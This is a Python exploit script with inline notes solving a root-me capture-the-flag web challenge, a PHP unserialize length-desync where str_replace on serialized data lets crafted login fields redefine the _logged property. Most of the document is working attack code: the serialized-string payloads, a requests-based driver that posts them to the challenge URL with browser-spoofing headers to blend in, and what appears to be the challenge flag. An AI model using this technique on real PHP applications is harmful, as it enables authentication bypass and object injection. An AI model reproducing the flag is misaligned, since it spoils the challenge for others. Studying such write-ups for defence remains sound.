deserialize_overflow

  1. import requests
  2.  
# Browser-looking request headers so the exploit traffic blends in with a
# normal Chrome session (the server is not known to check them).
_accept_language = 'en-US,en;q=0.9,vi;q=0.8'
_user_agent = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
               '(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36')
headers = dict([('Accept-language', _accept_language), ('User-agent', _user_agent)])


# Target: root-me web-server challenge ch65 (plain http, so no TLS is involved).
url = 'http://challenge01.root-me.org/web-serveur/ch65/'
  11. ## PHP: str_replace($search, $replace, $subject) -- the app runs this over the already-serialized object and never recomputes the s:N length fields
  12. '''vuln
  13. chr(0) . '*' . chr(0) => len == 3   (PHP's serialized marker for a protected property name: NUL * NUL)
  14. '\0\0\0'              => len == 6   (in PHP single quotes these are six literal characters, not three NUL bytes)
  15.  
  16. str_replace(chr(0) . '*' . chr(0), '\0\0\0', $serialized_value);
  17. username=guest;pass=guest
  18.  
  19. O:4:"User":4:{s:12:"*_username";s:5:"guest";s:12:"*_password";s:5:"guest";s:10:"*_logged";b:0;s:9:"*_email";s:0:"";}
  20. O:4:"User":4:{s:12:"\0\0\0_username";s:5:"guest";s:12:"\0\0\0_password";s:5:"guest";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
  21.                    ^ the s:12 / s:10 / s:9 lengths were computed on the 3-byte names, but the replaced names are 6 characters wide, so PHP unserialize now works on inconsistent s:N lengths
  22. => abuse that mismatch: a username made of literal \0\0\0 sequences declares more bytes than survive the reverse replacement on read, so the parser over-reads into the following fields and _logged can be redefined....
  23.  
  24. O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
  25. O:4:"User":4:{s:12:"\0\0\0_username";s:54:" *  *  *  *  *  *  *  *  * ";s:12:" * _password";s:XX:"";s:10:"\0\0\0_logged";b:0;s:9:"\0\0\0_email";s:0:"";}
  26.                                          |                                                      |
  27. O:4:"User":4:{s:12:"\0\0\0_username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:12:"\0\0\0_password";s:55:";s:12:"\0\0\0_password";s:0:"";s:10:"\0\0\0_logged";b:1;s:9:"\0\0\0_email";s:0:"";}
  28. '''
  29.  
  30. '''
  31. (in database)
  32. s:8:"username";s:54:"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";s:8:"password";s:10:"MYPASSWORD"
  33.  
  34. (after read and replace)
  35. s:8:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPASSWORD"   (27 chars remain but 54 are declared: the parser keeps reading into the next fields)
  36.  
  37. (Achieve Object injection):
  38. s:8:"username";s:54:"NNNNNNNNNNNNNNNNNNNNNNNNNNN";s:8:"password";s:10:"MYPA";s:2:"HS":O:15:"ObjectInjection"   (sketch: the over-read lets attacker-controlled bytes be parsed as new fields / objects)
  39. '''
  40.  
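class Hacker:
    """Exploit driver for the root-me ch65 PHP unserialize length-desync challenge.

    The target serializes a ``User`` object and passes it through ``str_replace``
    on the protected-property marker (``\\0*\\0`` is 3 bytes, its replacement
    ``'\\0\\0\\0'`` is 6 literal characters) without recomputing the ``s:N`` length
    fields. ``login()`` submits a username built from that literal sequence, so
    after the server's reverse replacement the username holds fewer bytes than
    it declares; the parser over-reads into the following fields and the
    ``password`` value is parsed as serialized data that redefines ``_logged``
    as ``b:1``. The serialized object presumably lives in the session cookie
    (``login`` only keeps the session; ``get_cookie`` re-fetches with it).
    """

    def __init__(self):
        self.url = url
        self.requests_session = requests.session()
        self.headers = headers
        # Point at an intercepting proxy (e.g. Burp on :8080) to watch the traffic.
        self.proxies = None
        # self.proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
        # Without a timeout a dead target hangs the script forever.
        self.timeout = 30

    @staticmethod
    def login_payload():
        """Return the POST form fields that trigger the length desync.

        The 27 literal ``\\0`` pairs (54 characters) collapse to 27 bytes once the
        server turns every 6-character ``\\0\\0\\0`` back into the 3-byte marker,
        so the parser reads 27 bytes past the real username: exactly
        ``";s:12:"\\0*\\0_password";s:NN:`` with a two-digit NN. The opening quote
        of the password field then terminates the username string, and the
        password value is parsed as the remaining object fields with ``_logged``
        set to ``b:1``. NOTE(review): the 27 is derived for a two-digit NN; if
        the password field's declared length changes digit count, re-derive it.
        """
        return {
            'username': '\\0' * 27,
            'password': ';s:12:"\\0\\0\\0_password";s:0:"";s:10:"\\0\\0\\0_logged";b:1;s:9:"\\0\\0\\0_email";s:0:"";}',
            'submit': 'login',
        }

    def login(self):
        """POST the crafted credentials; the session object keeps the cookie.

        Returns the ``requests.Response`` so the caller can inspect it.
        """
        # The same primitive (serialized-length desync through str_replace) is
        # described for Joomla at https://github.com/kiks7/rusty_joomla_rce and
        # https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
        #
        # verify=False only so an intercepting proxy's self-signed certificate is
        # accepted (the target here is plain http anyway); do not carry it into
        # non-lab tooling.
        return self.requests_session.request(
            "POST", self.url, data=self.login_payload(), headers=self.headers,
            proxies=self.proxies, verify=False, timeout=self.timeout,
        )

    def get_cookie(self):
        """Fetch the page with the session cookie; print and return the body.

        (Kept under its historical name: it does not extract a cookie, it uses
        the one the session already holds.) Returns the raw response bytes so a
        caller can search them for the success message / flag.
        """
        resp = self.requests_session.request(
            "GET", self.url, headers=self.headers, proxies=self.proxies,
            verify=False, timeout=self.timeout,
        )
        print(resp.content)
        return resp.content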
  66.  
  67. ## B3Carrefull-w1th_Unseri4l1ze
if __name__ == '__main__':
    # Send the desync payload first, then re-fetch the page with the session
    # cookie it produced and dump the body.
    attacker = Hacker()
    for step in (attacker.login, attacker.get_cookie):
        step()
  72.    
  73.    